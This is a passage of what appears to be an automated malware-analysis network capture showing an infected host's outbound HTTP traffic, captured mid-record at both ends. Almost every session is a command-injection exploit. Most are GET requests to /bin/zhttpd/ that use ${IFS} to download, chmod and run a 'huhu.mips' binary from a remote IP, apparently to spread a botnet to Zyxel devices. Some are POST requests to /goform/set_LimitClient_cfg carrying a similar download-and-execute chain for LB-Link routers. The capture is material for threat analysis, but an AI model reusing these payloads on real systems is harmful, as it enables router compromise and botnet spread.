                                      Jan 19, 2024 17:29:46.055423975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7850192.168.2.143367817.214.245.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055445910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7851192.168.2.1457746186.56.54.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055510998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7852192.168.2.144122420.78.48.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055558920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7853192.168.2.1434056173.187.183.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055607080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7854192.168.2.144622259.15.44.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055635929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7855192.168.2.1447778190.21.25.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055681944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7856192.168.2.1443646186.255.38.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055735111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7857192.168.2.1434550201.79.162.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055777073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7858192.168.2.1433100141.235.80.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055810928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7859192.168.2.1445176165.102.252.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055845976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7860192.168.2.1459540134.69.190.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055888891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7861192.168.2.1442480187.241.133.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055938959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7862192.168.2.1444428177.26.66.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055978060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7863192.168.2.1442452104.22.182.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056035042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7864192.168.2.1458080112.27.98.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056077003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7865192.168.2.1456518119.78.48.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056113958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7866192.168.2.145970697.28.164.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056180000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7867192.168.2.1452942130.139.66.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056227922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7868192.168.2.1456690144.191.32.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056257010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7869192.168.2.144923047.91.19.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056298971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7870192.168.2.1452194182.184.108.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056322098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7871192.168.2.1433906217.197.166.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056360960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7872192.168.2.145339017.55.26.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056421995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7873192.168.2.143628045.192.142.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.056827068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7874192.168.2.145579640.183.141.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.057385921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7875192.168.2.144107478.226.36.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.059776068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7876192.168.2.1440812202.222.3.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.059837103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7877192.168.2.145722641.229.61.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.059870005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7878192.168.2.1458934111.104.206.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.059887886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7879192.168.2.145638649.61.206.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.059953928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7880192.168.2.1458362172.67.129.708080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.643826962 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:46.764596939 CET328INHTTP/1.1 400 Bad Request
                                      Server: cloudflare
                                      Date: Fri, 19 Jan 2024 16:29:46 GMT
                                      Content-Type: text/html
                                      Content-Length: 155
                                      Connection: close
                                      CF-RAY: -
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7881192.168.2.1437004175.123.17.1488080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.818003893 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:48.316163063 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:50.108077049 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:53.851881981 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7882192.168.2.1454690196.51.146.1728080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.937810898 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:47.111139059 CET1286INHTTP/1.1 400 Bad Request
                                      Server: squid/3.5.20
                                      Mime-Version: 1.0
                                      Date: Fri, 19 Jan 2024 16:56:00 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Content-Length: 3468
                                      X-Squid-Error: ERR_INVALID_URL 0
                                      Connection: close
                                      Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                      Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7883192.168.2.1447176180.138.242.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067303896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7884192.168.2.1452516165.26.157.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067354918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7885192.168.2.1459954168.73.6.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067384958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
